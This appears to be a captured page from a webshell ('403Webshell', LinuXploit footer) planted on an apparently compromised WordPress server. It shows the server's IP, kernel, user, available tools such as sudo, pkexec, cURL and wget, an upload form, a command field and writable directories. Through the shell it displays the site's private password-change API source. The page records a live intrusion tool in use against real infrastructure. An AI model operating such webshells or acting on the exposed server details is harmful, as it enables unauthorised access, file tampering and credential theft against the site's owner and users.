403Webshell
Server IP : 158.247.231.215  /  Your IP : 216.73.217.84
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux CTMS 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /mnt/blockstorage/ctms/api/custom-api/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /mnt/blockstorage/ctms/api/custom-api/user-password-change.php
<?php
/**
 * Change Password API
 * POST /api/custom-api/user-password-change.php
 * Requires: Authorization header with Bearer token
 * Body: {current_password, new_password, confirm_password}
 */

header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Methods: POST, OPTIONS');
header("Access-Control-Allow-Headers: X-Requested-With, Content-Type, Authorization");
header('Content-Type: application/json');

if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
    http_response_code(200);
    exit();
}

// Load WordPress
require_once('/mnt/blockstorage/ctms/wp-load.php');
require_once('auth-helper.php');

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    send_error_response('Only POST requests are allowed', 405);
}

// Verify JWT token
$user_id = verify_jwt_token();

if (!$user_id) {
    send_error_response('User not authenticated', 401);
}

// Get POST data
$input = file_get_contents('php://input');
$data = json_decode($input, true);

if (!$data) {
    $data = $_POST;
}

$current_password = isset($data['current_password']) ? $data['current_password'] : '';
$new_password = isset($data['new_password']) ? $data['new_password'] : '';
$confirm_password = isset($data['confirm_password']) ? $data['confirm_password'] : '';

// Validation
if (empty($current_password) || empty($new_password) || empty($confirm_password)) {
    send_error_response('All password fields are required', 400);
}

if ($new_password !== $confirm_password) {
    send_error_response('New password and confirm password do not match', 400);
}

if (strlen($new_password) < 6) {
    send_error_response('New password must be at least 6 characters', 400);
}

// Get user
$user = get_user_by('id', $user_id);

if (!$user) {
    send_error_response('User not found', 404);
}

// Verify current password
if (!wp_check_password($current_password, $user->data->user_pass, $user_id)) {
    send_error_response('Current password is incorrect', 400);
}

// Update password
wp_set_password($new_password, $user_id);

send_json_response(array(
    'success' => true,
    'message' => 'Password changed successfully',
), 200);
?>

Youez - 2016 - github.com/yon3zu
LinuXploit